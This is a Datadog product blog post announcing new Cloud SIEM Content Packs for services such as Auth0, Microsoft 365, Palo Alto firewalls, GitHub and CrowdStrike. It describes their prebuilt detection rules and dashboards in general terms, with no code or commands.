What’s new in Cloud SIEM Content Packs: September 2024

Implementing a security incident and event management (SIEM) system can be complex and often requires considerable expertise. Teams need to configure a variety of data sources and ensure their SIEM can scale with growing data volumes. In addition, users need time to learn the system, which can delay value realization. And SIEMs also need continuous maintenance to ensure threat intelligence, detection rules, and integrations are up to date.

Datadog's Cloud SIEM Content Packs help customers rapidly onboard to Datadog Cloud SIEM so they can gain security insights faster. Content Packs provide a wealth of out-of-the-box content tailored to specific integrations, including pre-built threat detection rules, dashboards, an interactive investigator tool, workflow automation blueprints, and comprehensive written resources.

Since their launch in August 2023, we've expanded Cloud SIEM Content Packs-which initially included AWS CloudTrail, GCP Audit Logs, Azure Security, Kubernetes Audit Logs, Okta, 1Password, and Cloudflare-with a range of additional integrations. New additions include Google Security Command Center, Auth0, JumpCloud, Cisco DUO, Google Workspace, Microsoft 365, Slack, Cisco Meraki, Palo Alto Network Firewall, Cisco Umbrella DNS, NGINX, GitHub, Crowdstrike, and Windows Event Logs.

In this post, we'll highlight the latest additions to Cloud SIEM Content Packs and explore how they can help you strengthen security engineering and operations. We'll cover new Content Packs available in key areas of the security ecosystem, including:

• Cloud security
• Authentication
• Collaboration
• Network security
• Web security
• Cloud developer tools
• Endpoint security

Cloud security

Datadog Cloud SIEM analyzes cloud security findings, including suspicious users and potential threat activity, and organizes them by priority level to help you monitor your cloud instances for weak points, potential attacks, and code-level vulnerabilities.

Google Security Command Center

As your cloud infrastructure scales, so does your attack surface, making it essential to identify and address security threats. Google Cloud Security Command Center helps monitor your Google Cloud instances for vulnerabilities. Now, Datadog integrates these findings into Cloud SIEM.

This integration centralizes security findings from your Google Cloud environment in Datadog, including logs, traces, and metrics from across the stack. With this context close at hand, you can streamline investigations and quickly remediate issues before your system is compromised.

The integration comes with a built-in detection rule that generates a security signal in Cloud SIEM whenever Google Security Command Center detects an active threat. This rule filters for threat findings that have not been muted and focuses on those that signal potential active attacks or other malicious activities, helping teams respond to and mitigate threats more quickly.

View the Google Security Command Center Content Pack, or learn more in our blog post.

Authentication

Datadog Cloud SIEM can help you monitor and understand user and account access activity across authentication and audit logs, making it easier to catch unauthorized or over-privileged access.

Auth0

Auth0 is an authentication and authorization platform that provides developers the building blocks needed to secure applications written in any language or using any stack. It also helps them define the third-party providers and integrations that they want to use for a variety of identity and access management (IAM) use cases.

With the Auth0 Content Pack for Cloud SIEM, you can easily monitor security signals on Auth0 user activity and receive alerts on suspicious behavior so you can respond quickly. The integration includes several detection rules, as well as an out-of-the-box dashboard.

Let's say you're looking to improve visibility into activity occurring in Auth0. With this Content Pack, you can set up real-time notifications with high priority when an Auth0 tenant invitation is sent to a new user, a credential stuffing attack is detected, Guardian MFA push notifications are rejected, and more. The interactive Auth0 dashboard delivers detailed insights to help you stay on top of your logs and security signals, as well as track user activity, debug authentication and authorization issues, and create an audit trail for regulatory compliance.

View the Auth0 Content Pack, or learn more from our documentation.

Cisco Duo

Cisco Duo is a security platform that offers multi-factor authentication (MFA) and secure access solutions, allowing only trusted users and devices to access company applications and data. By integrating Cisco Duo with Cloud SIEM, organizations can monitor and analyze authentication activities in real time, detect potential security threats, and ensure compliance with regulatory requirements. This integration helps security teams identify unusual access patterns and correlate Duo logs with other security data, providing a comprehensive view of the organization's security posture.

The four detection rules featured in our new Content Pack help you detect the creation of a Cisco Duo bypass code by an administrator or a suspicious actor, monitor the use of such codes for user authentication, identify fraudulent authentication requests, and detect administrator account lockouts after multiple failed login attempts.

View the Cisco Duo Content Pack, or learn more from the configuration guide.

JumpCloud

JumpCloud is a cloud-based directory platform that provides centralized identity and access management, allowing organizations to manage user identities, devices, and IT resource access securely. By integrating Datadog Cloud SIEM with JumpCloud audit logs, organizations can track user activity and gain real-time insights into login attempts, access changes, and other actions. This integration helps detect suspicious activities and potential security threats, allowing for timely responses. Additionally, it ensures compliance with regulatory requirements by correlating JumpCloud logs with other security data, offering a comprehensive view of your organization's security posture.

With the pre-built detection rules offered in our JumpCloud Content Pack, security teams can receive notifications for a range of critical events, including:

• Users logging into JumpCloud with admin credentials without MFA
• Admin accounts granting system privileges to other accounts
• Modifications or creations of policies
• Assignment of administrator roles to user accounts
• Detection of credential stuffing attacks
• Identification of impossible travel scenarios where accounts are accessed from geographically distant locations within unrealistic time frames

View the JumpCloud Content Pack, or learn more in our blog post.

Collaboration

Cloud SIEM's integrations with collaboration and ChatOps solutions enables you to view, analyze, and monitor audit logs from these tools, and to centralize and correlate this data so that teams can quickly identify and respond to security incidents. This comprehensive visibility ensures more effective monitoring, streamlined investigations, and improved compliance across collaborative environments.

Google Workspace

Google Workspace audit logs provide essential data for monitoring the security of your cloud-based productivity tools. With Datadog's integration, you can search, analyze, and alert on these logs, centralizing key events, such as user logins, from Google Workspace applications like Gmail and Google Drive. This integration enhances your ability to detect potential security issues and quickly remediate problems by correlating Google Workspace audit logs with activity logs, metrics, and traces from your entire stack.

Our Google Workspace Content Pack features more than 15 comprehensive rules that help security teams safeguard their Google Workspace content, including any sensitive data. These rules range from lower-priority alerts-such as when a user disables their two-step verification-to higher-priority alerts, such as changes to account recovery information and other critical events. This broad range of rules ensures thorough protection across your Google Workspace environment.

View the Google Workspace Content Pack, or learn more in our blog post.

Microsoft 365

Microsoft 365 offers cloud-based productivity tools like Office, Skype, and Teams, which are central to many organizations' workflows. Monitoring activity across these services is crucial for security and compliance. Datadog now allows you to ingest Microsoft 365 audit logs, providing real-time analysis and alerts for security threats. This integration helps track key actions, user activity, and authentication events, enriching logs with metadata for better visibility and faster remediation.

With nearly 30 pre-built detection rules for Microsoft 365, security teams can robustly protect their Microsoft 365 content and sensitive data. These rules cover a range of priorities, including low-priority alerts like the observation of a new Microsoft Teams app or bot, or a SharePoint object being shared with a guest. They also include high-priority detections such as the deletion of multiple Microsoft Teams or Exchange inbox rules associated with business email compromise attacks. This comprehensive set of rules ensures effective and nuanced security for your Microsoft 365 environment.

View the Microsoft 365 Content Pack, or learn more in our blog post.

Slack

Integrating Slack audit logs with Cloud SIEM provides real-time monitoring and analysis of critical events such as logins, file downloads, and configuration changes. This integration provides a unified view of security signals in your Slack environment through centralized log management, so you can swiftly detect and remediate security issues.

A collection of pre-built Slack detection rules provides comprehensive security for your organization's sensitive internal communications and data. These rules cover a wide spectrum of activities. They can detect lower-priority events like the creation or deletion of an organization in Slack, as well as higher-priority issues such as changes to Slack SSO settings, modifications to data loss prevention (DLP) rules, or elevation of user roles to administrative privileges. By monitoring these activities, you can ensure robust protection against potential threats and maintain strict control over your Slack environment, enhancing both security and compliance.

View the Slack Content Pack, or learn more in our blog post.

Network security

Integrating Datadog Cloud SIEM with network security solutions enhances your security posture by providing comprehensive visibility and streamlined threat detection across your network infrastructure. Cloud SIEM analyzes security event logs and alerts on events such as intrusion detections, firewall rule violations, malware threat detections, and more. You can correlate activity across various network sources for faster identification of anomalies and potential security incidents.

Cisco Meraki

The Cisco Meraki MX security appliance uses Sourcefire Snort for intrusion detection and anti-malware technology for threat protection. It inspects HTTP file downloads and blocks or allows them based on threat intelligence from the AMP cloud. The intrusion detection engine monitors the network for malicious or unusual behaviors and raises alerts on potential threats. The appliance can also act as an intrusion prevention system (IPS), blocking harmful packets. Datadog Cloud SIEM analyzes Cisco Meraki security event logs to identify when intrusion detection system (IDS) alerts are created by the Meraki MX security appliance.

This integration not only alerts teams to potential threats but also provides valuable insights through a pre-built dashboard. The dashboard offers detailed views into log trends, user activity, and potential attacker patterns, enhancing the ability to detect, analyze, and respond to security incidents effectively. By consolidating these signals and trends, security teams can improve threat detection, streamline investigations, and strengthen network security.

View the Cisco Meraki Content Pack, or learn more in our blog post.

Cisco Umbrella DNS

Integrating Cisco Umbrella DNS with Datadog Cloud SIEM enhances your network security by providing comprehensive DNS-layer protection. Cisco Umbrella is renowned for its network DNS security monitoring, offering visibility and protection for users both on and off the network. By collecting DNS and proxy logs and sending them to Datadog, this integration enables easy searching and analysis through out-of-the-box log pipelines. Datadog's dashboards visualize total DNS requests, allowed/blocked domains, top blocked categories, and proxied traffic over time. Additionally, with Datadog Cloud SIEM, Umbrella DNS logs are analyzed using threat intelligence to identify potential threats, making it an invaluable tool for threat hunting and investigations.

The detection rules included in this content pack identify access to personal networks and flag requests to unsafe URL categories, helping you prevent unauthorized access. Our pre-built dashboard provides a concise and intuitive snapshot of network activity, offering you a comprehensive overview with total, blocked, and allowed metrics. This allows for immediate insights into web activity, empowering you to make informed decisions quickly. And by tracking proxied requests over time, you can identify trends and proactively optimize your network.

View the Cisco Umbrella DNS Content Pack, or learn more from our configuration guide.

Palo Alto Network Firewall

Integrating Datadog Cloud SIEM with Palo Alto Network Firewall enables you to analyze your logs for suspicious activities using industry-standard threat intelligence. With built-in detection rules, Datadog can flag and alert you to suspicious activities, like changes to firewall settings or unexpected traffic patterns. When a rule is triggered, Datadog generates a Security Signal with detailed context, enabling you to quickly assess and respond to potential threats. This integration ensures proactive threat mitigation, allowing you to maintain a secure network environment effectively.

The pre-built detection rules for this content pack identify suspicious activities, such as command-and-control traffic and crypto mining activity. Our interactive dashboard offers deep insights into top suspicious users, potential threats, flagged IPs, countries, and more. This comprehensive view allows you to quickly pinpoint and address security issues, so you can maintain a secure, efficient network.

View the Palo Alto Network Firewall Content Pack, or learn more in our blog post.

Web security

Datadog Cloud SIEM enhances web security by providing comprehensive visibility and real-time threat detection across web applications and services. It can monitor web traffic, detect anomalies, and identify potential vulnerabilities or attacks, such as SQL injections, cross-site scripting, or DDoS attacks. By leveraging advanced analytics and automation, Cloud SIEM enables security teams to respond swiftly and effectively to web-based threats, ensuring robust protection for online assets.

NGINX

Integrating Datadog Cloud SIEM with NGINX enables comprehensive monitoring and response to web-based risks, providing real-time visibility into NGINX server activities so teams can detect potential threats and respond swiftly. By leveraging pre-built threat detection rules and dashboards, organizations can enhance their web security posture and ensure a robust defense against emerging threats.

This integration enables you to detect malicious scans targeting your web servers. It includes out-of-the-box detection rules for vulnerabilities that may affect your Apache or NGINX web servers, including the Log4j vulnerability.

View the NGINX Content Pack, or learn more in our blog post.

Cloud developer tools

Cloud developer tools have become indispensable for building, deploying, and managing applications. Developers increasingly rely on these tools to store and collaborate on critical code, and ensuring their security has become paramount. Datadog Cloud SIEM offers comprehensive visibility into key developer tools, with real-time monitoring and analysis of security events across your cloud infrastructure.

GitHub

GitHub is a mission-critical software development and version control platform that stores proprietary source code and other sensitive data. Monitoring logs generated by activity in your GitHub environment is essential, as unexpected patterns of behavior could indicate attacker activity or insider threats. The Datadog GitHub Cloud SIEM integration ingests and normalizes audit logs streamed from GitHub. In addition, it also includes detection rules that allow you to quickly detect suspicious GitHub activities in your GitHub audit logs that might signal an attack, such as anomalous cloning of repositories or the addition of new enterprise administrators.

The pre-built detection rules available with this integration cover a wide spectrum of security priorities. They include lower-priority alerts-such as identifying when GitHub payments are removed or when branch protection requirements are overridden by repository administrators-and higher-priority alerts for suspicious activities like the disabling or bypassing of GitHub Secret Scanning or the deactivation of GitHub Dependabot settings. By catching these issues early, you can take swift corrective action to prevent breaches and ensure the integrity and reliability of your development environment.

View the GitHub Content Pack, or learn more in our blog post.

Endpoint security

Cloud infrastructure and endpoints are prime targets for cyberattacks, making it critical to integrate SIEMs with endpoint security solutions. Datadog Cloud SIEM offers real-time monitoring and comprehensive visibility across your entire cloud environment, and integrating with endpoint solutions extends this capability to individual devices.

CrowdStrike

CrowdStrike is a single-agent solution to stop breaches, ransomware, and cyberattacks with comprehensive visibility and protection across endpoints, workloads, data, and identity. The Datadog Cloud SIEM CrowdStrike integration helps detect suspicious activity to improve the security posture of your endpoints.

When CrowdStrike raises an alert, our third-party detection method will identify the following CrowdStrike events and notify security teams for rapid response:

• Detection summary
• Firewall match
• Identity protection
• IDP detection summary
• Incident summary
• Authentication events
• Detection status updates
• Uploaded IoCs
• Network containment events
• IP allowlisting events
• Policy management events
• CrowdStrike store activity
• Real-time response session start/end
• Event stream start/stop

Our integration features a detection rule that generates signals in Cloud SIEM from critical CrowdStrike logs and alerts, ensuring real-time threat awareness. The interactive dashboard offers a comprehensive view of top events, security signals, and alerts by user and host, allowing your security team to quickly identify and prioritize threats. With the ability to search, filter, and alert on all CrowdStrike events within Datadog, you can focus on relevant data and improve your overall security efficiency.

View the CrowdStrike Content Pack, or check out our documentation.

Windows event logs

Windows event logs contain detailed records generated by the Windows OS that capture system, security, and application events, providing essential insights for diagnosing issues and detecting unauthorized access attempts. By sending Windows event logs to Datadog Cloud SIEM, security teams can gain real-time visibility into system activities, detect suspicious behavior, and respond promptly to threats. They can also correlate these logs with other security data in Datadog, enhancing incident investigation and compliance with a comprehensive view of security posture.

This integration provides more than 10 pre-built detection rules that alert security teams to suspicious activities. Medium-priority alerts notify you of events like multiple failed login attempts, suspicious named pipes, and disabled Windows firewalls. High-priority alerts cover critical activities such as changes to the Windows domain admin group, directory service restore mode, password modifications, and audit log clearance.

View the Windows event logs Content Pack or learn more in our blog post.

Speed up and simplify your security monitoring with Content Packs

Datadog Cloud SIEM Content Packs help security teams rapidly onboard their SIEM by providing bundled content related to key integrations. Teams can gain actionable security insights into their cloud environments to keep up with threats in real time, visually investigate across historical data, and automate response with security Workflow Automation.

Read more about Content Packs in our dedicated blog post, and check our documentation for a frequently updated Content Packs library. If you don't already have a Datadog account, you can sign up for a 14-day free trial to get started.

Public link

Please use the above public link if you want to share this noodl on another website.